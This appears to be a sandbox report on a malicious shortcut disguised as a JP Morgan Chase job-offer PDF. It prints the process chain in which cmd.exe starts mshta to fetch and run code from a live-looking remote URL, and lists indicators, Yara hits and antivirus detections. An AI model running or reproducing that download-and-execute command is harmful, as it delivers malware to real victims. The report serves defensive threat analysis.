Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 8, 2021, 11:58 a.m.	Sept. 8, 2021, noon

Size	724.6KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=13, Archive, ctime=Wed Apr 21 18:38:09 2021, mtime=Sun Jun 20 17:22:19 2021, atime=Wed Apr 21 18:38:09 2021, length=289792, window=hide
MD5	`aefa2caddfeb3bccb1e696cc2cd6955a`
SHA256	`0f73d0269cf77c53a38fb5863258755e3055979a6343d15573ab2222ce75f49b`
CRC32	`C71CA7F8`
ssdeep	`12288:DACM+Gn3OUWzGwFS4U9bZTa+ugkWQWCojChVQI9hujrCiIhUfQNd6wxW0:Dq+G3OVnW9uS6vQONfxW0`
Yara	Generic_Malware_Zero - Generic Malware Lnk_Format_Zero - LNK Format anti_vm_detect - Possibly employs anti-virtualization techniques

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "nNBtsLYJmFpwZQCM" "C:\Users\test22\AppData\Local\Temp\JP Morgan Chase Job Opportunities.pdf.lnk"
2304
- cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=
  2424
  - mshta.exe C:\Windows\System32\mshta https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=
    2628

Name	Response	Post-Analysis Lookup
www.googlesheetpage.org	A 139.180.164.131	139.180.164.131

IP Address	Status	Action
139.180.164.131	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49170 -> 139.180.164.131:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49170 139.180.164.131:443	C=US, O=Let's Encrypt, CN=R3	CN=googlesheetpage.org	b7:04:d9:0c:bb:bd:73:6b:08:a8:ad:84:f9:11:1b:44:43:b3:91:5d

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 8, 2021, 11:58 a.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\JP Morgan Chase Job Opportunities.pdf.lnk

Creates a suspicious process (2 events)

cmdline	C:\Windows\System32\mshta https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=
cmdline	"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 8, 2021, 11:58 a.m.	process_identifier: 2628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://www.googlesheetpage.org/bSQphSxgStENEhz5Y

Yara rule detected in process memory (39 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Sept. 8, 2021, 11:58 a.m.	key_handle: 0x000002c0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2304 resumed a thread in remote process 2424
Process injection	Process 2424 resumed a thread in remote process 2628
NtResumeThread Sept. 8, 2021, 11:58 a.m.	thread_handle: 0x000002f0 suspend_count: 1 process_identifier: 2424	1	0	0
NtResumeThread Sept. 8, 2021, 11:58 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2628	1	0	0

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

Lionic	Trojan.WinLNK.Nioc.4!c
CAT-QuickHeal	LNK.Agent.41324
ALYac	Trojan.Agent.LNK.Gen
Arcabit	Heur.BZC.YAX.Nioc.1.078B6D01
ESET-NOD32	LNK/Agent.GX
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
BitDefender	Heur.BZC.YAX.Nioc.1.078B6D01
ViRobot	LNK.S.Downloader.742035
MicroWorld-eScan	Heur.BZC.YAX.Nioc.1.078B6D01
Tencent	Heur:Trojan.Winlnk.Downloader.wya
Ad-Aware	Heur.BZC.YAX.Nioc.1.078B6D01
Emsisoft	Heur.BZC.YAX.Nioc.1.078B6D01 (B)
McAfee-GW-Edition	LNK/Agent-FNW!AEFA2CADDFEB
FireEye	Heur.BZC.YAX.Nioc.1.078B6D01
Sophos	Troj/DownLnk-X
Ikarus	Trojan.LNK.Agent
MAX	malware (ai score=100)
Microsoft	Exploit:Win32/Aicat.A!ml
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
GData	Heur.BZC.YAX.Nioc.1.078B6D01
AhnLab-V3	LNK/Autorun.Gen
McAfee	LNK/Agent-FNW!AEFA2CADDFEB
VBA32	Trojan.Link.Crafted
Zoner	Probably Heur.LNKScript
Rising	Downloader.Mshta/LNK!1.BADA (CLASSIC)
SentinelOne	Static AI - Malicious LNK
AVG	Other:Malware-gen [Trj]

JP Morgan Chase Job Opportunities.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All